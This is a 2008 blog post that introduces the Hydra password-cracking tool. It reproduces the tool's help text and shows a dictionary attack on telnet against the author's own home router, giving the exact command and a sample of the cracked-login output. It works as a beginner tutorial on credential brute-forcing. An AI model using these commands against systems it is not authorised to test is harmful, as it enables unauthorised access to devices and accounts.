Tuesday, November 4, 2008

Hydra / Hydra GTK - Basic Cracking (Hacking)

Well its time to begin a short series of Hydra. I was very surprised at how many hits my original blog post received. Unfortunately, it didn't really have any useful information. ha BUT, this post is to make up for it. So, we are going to start with some basic cracking. At this time I won't be getting into installing it on any particular operating system.


If you run the program with no arguments, you get this:


Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC

Syntax: ./hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd
OPT some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org

This is all GOOD information. I would bet most of you could figure out what to do from here.


So, I am going to try and break into the router at my house. Telnet is open from the inside so that will be a good service to start with. Many home routers will have telnet as an option for management. You may need to log into the web-gui to enable it though. Another great way to try and break in is if your router has a username/password prompt that comes up before you can do anything (NOT a web form login).

For starters, we need a password list. Open vi or notepad and create a short list of random words. Make sure your current password is NOT in the list. Also, you could do the same for usernames but we will be assuming you know the username already. :) The last assumption is that you know the IP address. I will be using 192.168.1.1 but make sure you change it if needed. If your telnet server does not require a username then you will need to play with hydra a little bit to make it work (sorry, won't be getting into that today).

Enter this:
hydra -l admin -P passwordlist.txt 192.168.1.1 telnet

There. That was simple wasn't it? It should complete shortly. Now, put your current password in the password list you created earlier. If all goes well, you should see something like:

[23][telnet] host: 192.168.1.1 login: admin password: abc123



Just as an FYI, I plan on making a 'mini-series' linkable on the right side. Please feel free to let me know what you would like to know about hydra and I will do a write-up on it. :)